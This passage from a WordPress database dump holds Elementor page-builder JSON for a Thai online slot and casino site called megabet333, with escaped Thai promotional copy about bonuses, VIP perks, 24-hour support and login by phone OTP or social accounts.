\\u0e46<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/Character_slot_3_-_Megabet333-Biz.webp\",\"id\":52,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 megabet333 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e48\\u0e22\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 24 \\u0e0a\\u0e21. \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e01\\u0e32\\u0e23\\u0e41\\u0e01\\u0e49\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e01\\u0e35\\u0e48\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e01\\u0e21 \\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14 \\u0e44\\u0e25\\u0e19\\u0e4c \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 SSL Encryption \\u0e17\\u0e35\\u0e48\\u0e40\\u0e17\\u0e35\\u0e22\\u0e1a\\u0e40\\u0e17\\u0e48\\u0e32\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e25\\u0e01 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14\\u0e16\\u0e39\\u0e01\\u0e40\\u0e01\\u0e47\\u0e1a\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e08\\u0e32\\u0e01\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e21\\u0e15\\u0e35\\u0e41\\u0e25\\u0e30\\u0e01\\u0e32\\u0e23\\u0e23\\u0e31\\u0e48\\u0e27\\u0e44\\u0e2b\\u0e25\\u0e02\\u0e2d\\u0e07\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25 100% \\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e40\\u0e17\\u0e04\\u0e19\\u0e34\\u0e04\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e22\\u0e15\\u0e23\\u0e27\\u0e08\\u0e2a\\u0e2d\\u0e1a\\u0e41\\u0e25\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e01\\u0e25\\u0e32\\u0e07\\u0e27\\u0e31\\u0e19\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e25\\u0e32\\u0e07\\u0e04\\u0e37\\u0e19 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e1e\\u0e31\\u0e01\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e17\\u0e35\\u0e48\\u0e14\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e2d\\u0e22\\u0e32\\u0e01\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e32\\u0e1a\\u0e23\\u0e37\\u0e48\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(1205,149,'_thumbnail_id','60'),(1206,149,'_elementor_edit_mode','builder'),(1207,149,'_elementor_template_type','wp-page'),(1208,149,'_elementor_version','3.32.5'),(1209,149,'_elementor_pro_version','3.32.3'),(1210,149,'_wp_page_template','default'),(1211,149,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(1212,149,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/search_megabet_333_-_Megabet333-Biz.webp\",\"id\":60,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2025\\/10\\/79_Get_200_-_Megabet333-Biz.webp\",\"id\":53,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e23\\u0e31\\u0e1a\\u0e44\\u0e14\\u0e49 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e23\\u0e30\\u0e1a\\u0e1a VIP \\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e04\\u0e48\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e47\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e1b\\u0e31\\u0e07 \\u0e46 \\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e43\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e19 \\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e15\\u0e2d\\u0e1a\\u0e41\\u0e17\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e41\\u0e17\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e01\\u0e23\\u0e14\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e31\\u0e1a\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2a\\u0e14\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e49\\u0e19 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1e\\u0e49\\u0e43\\u0e04\\u0e23 \\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e02\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e27\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e47\\u0e15 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e01\\u0e25\\u0e38\\u0e48\\u0e21 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e22\\u0e31\\u0e07\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e15\\u0e2d\\u0e1a\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e17\\u0e38\\u0e01\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"megabet333 3 \\u0e27\\u0e34\\u0e18\\u0e35\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2d\\u0e31\\u0e19\\u0e14\\u0e31\\u0e1a 1 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e37\\u0e48\\u0e19\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e25\\u0e47\\u0e2d\\u0e01\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e22\\u0e39\\u0e2a\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e44\\u0e21\\u0e48\\u0e22\\u0e32\\u0e01 <\\/span><b>megabet333 <\\/b><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e44\\u0e21\\u0e48\\u0e16\\u0e36\\u0e07\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e40\\u0e2d\\u0e01\\u0e2a\\u0e32\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b \\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e14\\u0e33\\u0e40\\u0e19\\u0e34\\u0e19\\u0e01\\u0e32\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e46 \\u0e41\\u0e04\\u0e48 3 \\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49\\u00a0<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><b><span style=\\\"color: #ffcc00;\\\">\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d<\\/span> <\\/b>\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e01\\u0e23\\u0e2d\\u0e01\\u0e40\\u0e1a\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e17\\u0e23\\u0e28\\u0e31\\u0e1e\\u0e17\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e30\\u0e2a\\u0e48\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a OTP \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e22\\u0e37\\u0e19\\u0e22\\u0e31\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e08\\u0e32\\u0e01\\u0e19\\u0e31\\u0e49\\u0e19\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e15\\u0e31\\u0e49\\u0e07\\u0e23\\u0e2b\\u0e31\\u0e2a\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e08\\u0e33\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19<\\/li><li><span style=\\\"color: #ffcc00;\\\"><b>\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e42\\u0e0b\\u0e40\\u0e0a\\u0e35\\u0e22\\u0e25\\u0e21\\u0e35\\u0e40\\u0e14\\u0e35\\u0e22 <\\/b><\\/span>\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2d\\u0e35\\u0e40\\u0e21\\u0e25 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1c\\u0e48\\u0e32\\u0e19 Facebook, Google \\u0e2b\\u0e23\\u0e37\\u0e2d Line \\u0e44\\u0e14\\u0e49\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 